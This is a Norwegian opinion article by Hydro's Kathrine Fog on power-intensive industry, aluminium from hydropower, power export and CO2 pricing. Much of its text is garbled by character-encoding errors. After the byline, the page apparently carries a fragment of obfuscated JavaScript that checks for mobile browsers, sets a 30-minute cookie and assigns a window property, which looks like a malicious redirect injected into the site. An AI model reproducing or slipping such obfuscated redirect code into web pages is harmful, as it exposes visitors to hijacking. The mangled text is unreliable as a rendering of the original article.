Industri og energi – felles utfordringer

Bilde av Hydros fabrikk i Ai??rdal

Aluminiumsfabrikken til Hydro i Ai??rdal er eksempel pA? industri som trenger mye kraft. Foto: Scanpix

Industri og energi er to sider av samme sak i Norge. Den kraftforedlende
industrien i Norge ble opprinnelig etablert nettopp for A? foredle
kraftressursene fra vannkraften, skriver Hydros Kathrine Fog.Ai??

I over 100 A?r har kraftforedlende industri lagt grunnlaget for verdiskaping i Norge. I Norge produserer Hydro aluminium fra norsk vannkraft. Vi mener det er
viktig A? bygge videre pA? de fortrinn Norge har i form av tilgang til
fornybar energi. Ressursene bA?r utnyttes bA?de i foredlet form — som f.eks.
aluminium — og i form av elektrisk kraft, for innenlands forbruk og
utveksling. Etter vA?rt syn er det ikke noen motsetning mellom eksport og
utveksling av kraft, og eksport av aluminium: Begge deler er eksport av
fornybar energi, videreforedlet eller som rA?vare. Begge formA?lene kan bidra
til A? lA?se klimautfordringene, og begge gir verdiskaping for fellesskapet.

Global etterspA?rsel etter aluminium A?ker jevnt og trutt i takt med
A?konomisk vekst. Siden tilgang til fornybar energi er en mangelvare
globalt, vil aluminium produsert pA? norsk vannkraft bidra med lavere
klimautslipp enn aluminium produsert de fleste andre steder. I tillegg
brukes Hydros aluminium i produkter som gir lavere utslipp i bruk.
Aluminium er lett og fleksibelt, og bidrar blant annet til lavere
CO2-utslipp i biler og mer energieffektive bygninger verden over.

Hydro stA?tter global CO2-prising. Vi er samtidig opptatt av at industrien
mA? gis like konkurransevilkA?r sA? lenge de politiske rammebetingelsene
varierer. Norge har rikelig tilgang til fornybare energiressurser. Dette
gir et godt grunnlag for industriell verdiskaping.Ai?? Og nA?r de fleste land
etterhvertAi?? har innfA?rt kostnader for klimautslipp sA? vil Norge vAi??re blant
de mest attraktive stedene — A?konomisk og klimamessig — A? produsere
f.eks. aluminium.

Av Kathrine Fog, ass. direktA?r, Energy Analysis and Policy, Hydro bc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Det er stengt for kommentarer.